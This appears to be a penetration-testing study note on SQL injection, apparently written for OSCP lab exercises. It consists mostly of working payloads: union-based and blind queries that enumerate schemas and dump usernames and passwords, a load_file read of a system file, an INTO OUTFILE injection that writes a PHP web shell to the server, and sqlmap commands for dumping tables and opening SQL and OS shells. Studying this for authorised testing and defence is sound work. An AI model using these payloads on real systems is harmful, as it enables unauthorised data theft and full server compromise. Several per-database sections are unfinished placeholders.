
Caused by [unsanitized](Unsanitized%20%Data.md) user input being inserted into queries and subsequently passed to a database for execution.  
  
[sqlmap](sqlmap.md) - SQL Injection scanner & exploitation tool  
  
Doesn't always have to be w/in form fields - Can also occur within URLs  
```null
http://192.168.xxx.10/debug.php?id='
```

  
Can test with malformed input values:  
```sql
' " ` % %% -- /* // ) ;
```


Different syntax is required based on the database engine or scripting language used.  
  
**--**    Start of a single line comment.  
	If errors out, may need to add ‘ //’ or ‘ /*’  
	In MySQL, the **--** comment style requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on).  
	The safest solution for inline SQL comment is to use **--**\<space\>\<any character\> such as **-- -** because if it is URL-encoded into **--%20-** it will still be decoded as **-- -**  
**#**   Comment marker (MySQL/ MariaDB)  
%00    Comment marker (less common)  
**;**    Statement terminator and a way to separate each SQL statement  
**%**    Wildcard  
**'**    String delimiter. Useful for finding vulns:  

```sql
' OR 1=1 ;#
```
	- tautology (condition that's always true)  
  
  

### SQL Statements:
  
SELECT: Extracts data from a db/ Selects specific db or table  
INSERT INTO: Inserts new data into a db  
```sql
insert into users (username,password) values ('bob','password123');
```
 
UPDATE: Updates data in a db  
```sql
update users SET username='root',password='pass123' where username='admin';
```

DELETE:   Deletes data from a db  
   
FROM:   Used to specify desired table  
WHERE:   Used to filter records (ex: id=1)  
  
UNION:   Combines the result-set of two or more SELECT statements  
	\*Each SELECT statement **MUST** return the same number of columns.  
INTERSECT:   Displays the rows that are common to all SELECT statements  
  
LIMIT:   Returns first # of rows matching the query  
	LIMIT 2, 1 Returns 1 row, skips the first 2. (1st number - how many rows to skip; 2nd - how many rows to return)  
ORDER BY _#_:   Sorts the results based on the values in the _#_ column.  
	- Can be used to find max # of columns by incrementing until an error is thrown - Easily automated w/ [BurpSuite's](BurpSuite.md) Repeater  
  
SUBSTR(1,2,3)   Extracts a substring from a string  
		1. Operated text (in our case database name)  
		2. Character to start with  
		3. Number of characters to extract  
Ex:
```sql
1' AND (ascii(substr((select database()),2,1))) < 115 --+
```
	compares the ascii value of the 2nd character of the db's name to 115 ('s')  
  
  
SHOW SCHEMAS/ DATABASES;    Lists all available dbs. *Ensure **;** at end  
SHOW TABLES FROM _\<db\>_;    Lists all tables within specified db  
USE _\<db\>_;    Switches to specified db  
  
\*Note: Some languages have functions that query the db and expect a single record, so if these functions get more than one row, they'll throw an error.  
If we do get these errors, we can instruct the query to return a fixed number of records w/ the LIMIT statement.  
  
Ex:  
Doesn't work:
```sql
' OR 1=1;#
```
 
Does work:
```sql
' OR 1=1 LIMIT 1;#
```

Possibly works:
```sql
' OR 1=1;-- -
```

[https://blog.raw.pm/en/sql-injection-mysql-comment/](https://blog.raw.pm/en/sql-injection-mysql-comment/)  
  
If two or more fields are requested, may need to have both w/in URL/ input fields  
Ex:  
```sql
login?profileID=-1' or 1=1--&password=a
```

  
  
### Types:  
- **In-Band** - Results are returned onscreen  
- **Error-Based** - Obtaining info about the db structure through error messages  
- **Blind-Based** - Little to no feedback given whether query works or not as error messages are disabled (can still use for auth bypass on login pgs)  
- **Union-Based** - Uses UNION operator alongside SELECT to return additional results  
- **Boolean-Based** - Where response only returns one of two options: true/ false  
• **Out-of-Band** - Relies on specific features enabled in the db or webapp logic which makes an external network call based on the SQL query results.  
	- Two different communication channels: one to launch attack, one to gather results  
	- Less common.  
		1. An attacker makes a request to a website vulnerable to SQL Injection with an injection payload.  
		2. The Website makes an SQL query to the database which also passes the hacker's payload.  
		3. The payload contains a request which forces an HTTP request back to the hacker's machine containing data from the database.  
  
Ex: DNS can be used to exfil data from a db  
  
  
  
### Column Number Enum:
```sql
http://192.168.xxx.10/debug.php?id=1 order by 1
```
If there is at least one column in the query, it's valid and the page will render w/o errors.  
  
  
To determine which columns are displayed on a page and where:  
Ex: Assuming 3 columns total in the db  
```sql
http://192.168.xxx.10/debug.php?id=1 UNION ALL SELECT 1, 2, 3
```

  
\***IF** the results of the page don't display the numbers after SELECT ^, you may need to adjust above to:
```sql
id=0 UNION
```
to prevent the first returned result somewhere in the web site's code from being displayed.  
  
  
Whichever columns are displayed, we can target that column and use it to extract data from the db:  
\***Note** - Following cmds are platform specific  
Ex: Using column 3 for data extraction:  
```sql
UNION ALL SELECT 1, 2, @@version
```
	Shows version of MySQL software  
  
---------- [SEE BELOW FOR MORE BY LANGUAGE](#Language%20Syntax) ----------  
  
```sql
UNION (SELECT TABLE_NAME, TABLE_SCHEMA, 3 FROM information_schema.tables
```

```sql
UNION ALL SELECT 1, username, password FROM users
```
	Retrieves cell data for _username_ and _password_ fields in the _users_ table
```sql
UNION ALL SELECT * FROM users
```
	works too  
  
\*Note: Don't forget commas to delineate!  
  
After finding out the db in use w/ _database()_, find out table names:  
```sql
0 UNION SELECT 1, 2, group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'db'
```


Can then discover names of columns of the above found table:  
```sql
0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'table'
```


Can then find details from table using either:  
```sql
0 UNION SELECT * FROM table_name where username='user'
```
```sql
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM tablen
```
	Provides list in single line & uses HTML tag _<br>_ for line breaks btw entries  
  
  
  
### Blind-Based Auth Bypass:
Login forms that are connected to a db of users are often developed so the web app isn't interested in the content of the fields but whether the two make a matching pair in the users table  
  
→ Leads to:  
**Boolean-Based:**  
When you have a login that checks for usernames already taken: can enum looking for results that return ‘true’  
```sql
false_user' UNION SELECT 1,2,3 where database() like '%';--
```
	Can cycle through _‘a%’_, _‘b%’_, _‘c%’_, etc etc until you reach a ‘true’ result telling you the start of the name of the db.  
		Can then cycle through all combinations of _‘sa%’_, _'sb%'_, _‘sc%’_, etc etc until all letters of the db name are discovered.  
  
Then can enum through table names within discovered db:  
```sql
false_user' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'found_table' and table_name like 'a%';--
```

  
Can confirm found table within found db:  
```sql
false_user' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'found_db' and table_name='found_table';--
```


Enum through columns:  
```sql
false_user' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='found_db' and TABLE_NAME='found_table' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';  

```
  
  
Enum through data:  
```sql
false_user' UNION SELECT 1,2,3 FROM found_table WHERE username_col='a%'
```
	Find usernames  

```sql
false_user' UNION SELECT 1,2,3 FROM found_table WHERE username_col='admin' and password_col like 'a%'
```
	Find passwords  
  
  
  
### Time-Based Blind SQLi:
Similar to Boolean-Based, but the time it takes for the query to complete indicates whether the the query is correct or not.  
  
Time delay method SLEEP(x) is added alongside UNION statement, whereby SLEEP(x) will only get executed upon a successful UNION SELECT statement.  
```sql
false_user' UNION SELECT SLEEP(5);--
```
  
Can then craft enumeration queries as shown above ^^  
  
  
### Code Execution:
Depends on OS, service privileges, & filesystem permissions.  
  
Can use [load_file](https://www.exploit-db.com/papers/14635) and _Into OUTFILE_ functions to read from/ write to a file on the underlying OS.  
  
Read from hosts file:  
```sql
http://192.168.xxx.10/debug.php?id=1 UNION ALL SELECT 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')
```
 
Writing a PHP backdoor to the web server:  
```sql
http://192.168.xxx.10/debug.php?id=1 UNION ALL SELECT 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'
```


If the above works, we can access the backdoor:  
```null
http://192.168.xxx.10/backdoor.php?cmd=ipconfig
```

  
  
### Automation ([sqlmap](sqlmap.md)):

See if vuln exists: (Can specify parameter w/ **-p**)  
```bash
sqlmap -u "http://192.168.xxx.10/debug.php?id=1"
```

Enumerate available databases:  
```bash
sqlmap -u "http://192.168.xxx.10/debug.php?id=1" --dbs
```

Enumerate given database's tables:  
```bash
sqlmap -u "http://192.168.xxx.10/debug.php?id=1" -D webappdb --tables
```

Enumerate given db's table's columns:  
```bash
sqlmap -u "http://192.168.xxx.10/debug.php?id=1" -D webappdb -T users --columns
```
  
Dump info:  
```bash
sqlmap -u "http://192.168.xxx.10/debug.php?id=1" -D webappdb -T users --dump
```
  
Can try for a SQL shell:  
```bash
sqlmap -u "http://192.168.xxx.10/debug.php?id=1" --sql-shell
```

Or an OS shell:  
```bash
sqlmap -u "http://192.168.xxx.10/debug.php?id=1" --os-shell
```
	- Need to choose back-end DBMS (ASP, ASPX, PHP, JSP)  
	- Will ask “Retrieve command from standard output”. (yes, no, always)  
  
  
  
### Language Syntax:

**MySQL/ MSSQL**  

```sql
information_schema
```
	DB metadata  

```sql
@@version
```
	Shows db version  

```sql
user()
```
	Shows user and hostname of the account interacting w/ the db  

```sql
database()
```
	Shows name of the db in use  

```sql
system_user()
```
	Shows account name used for Windows authentication used by the db  

```sql
table_name FROM information_schema.tables
```
	Enumerates through all tables listed in schema  

```sql
UNION (SELECT TABLE_NAME, TABLE_SCHEMA, 3 FROM information_schema.tables
```

```sql
column_name FROM information_schema.columns WHERE table_name='users'
```
	Retrieves column names from the _users_ table  

```sql
UNION (SELECT COLUMN_NAME, 2, 3 FROM information_schema.columns WHERE TABLE_NAME='users'
```

  
 
**Oracle**  
```sql
(SELECT banner FROM v$version)
```
	DB metadata  


-- Shows db version  
-- Shows user and hostname of the account interacting w/ the db  
-- Shows name of the db in use  
-- Shows account name used for Windows authentication used by the db  
-- Enumerates through all tables listed in schema  
-- Retrieves column names from the _users_ table  
  
  
  
  
**sqlite**  
```sql
sqlite_schema  
sqlite_master
```
	DB metadata  

```sql
sqlite_version()
```
	Shows db version  


-- Shows user and hostname of the account interacting w/ the db  
-- Shows name of the db in use  
-- Shows account name used for Windows authentication used by the db  

```sql
(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
```
	Enumerates through all tables listed in schema  

```sql
(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='users')
```
	Retrieves column names from the _user_s table  

```sql
UNION SELECT 1,group_concat(password) FROM users-- -
```
	Dump passwords from _users_ table  
  

worked for OSCP exercise:
```sql
http://192.168.215.52/debug.php?id=1 union select username, flag, time, password, 5 from users
```

```sql
sqlite_schema.type
```
	‘table’, ‘index’, ‘view’, or ‘trigger’  

```sql
sqlite_schema.name
```
	Holds name of the object  

```sql
sqlite_schema.sql
```
	Stores SQL text that describes the object (CREATE statement)  
  
```sql
admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = CAST(X'54' as Text)-- -
```
	Blind-Based Auth Bypass using Boolean-Based SQLi  
		CAST() - Convert value to a type.  
		X'54' - Hex representation of ‘T’. x'54' for ‘t’  

```sql
admin' AND length((SELECT password from users where username='admin'))==#-- -
```
	Check length of password  
  

**H2**  
```sql
schema()
```
	DB metadata  

```sql
h2version()
```
	Shows db version  



-- Shows user and hostname of the account interacting w/ the db  
-- Shows name of the db in use  
-- Shows account name used for Windows authentication used by the db  
-- Enumerates through all tables listed in schema  
-- Retrieves column names from the _users_ table  
  
  
  
  
**PostgreSQL**  
-- DB metadata  
-- Shows db version  
-- Shows user and hostname of the account interacting w/ the db  
-- Shows name of the db in use  
-- Shows account name used for Windows authentication used by the db  
-- Enumerates through all tables listed in schema  
-- Retrieves column names from the _users_ table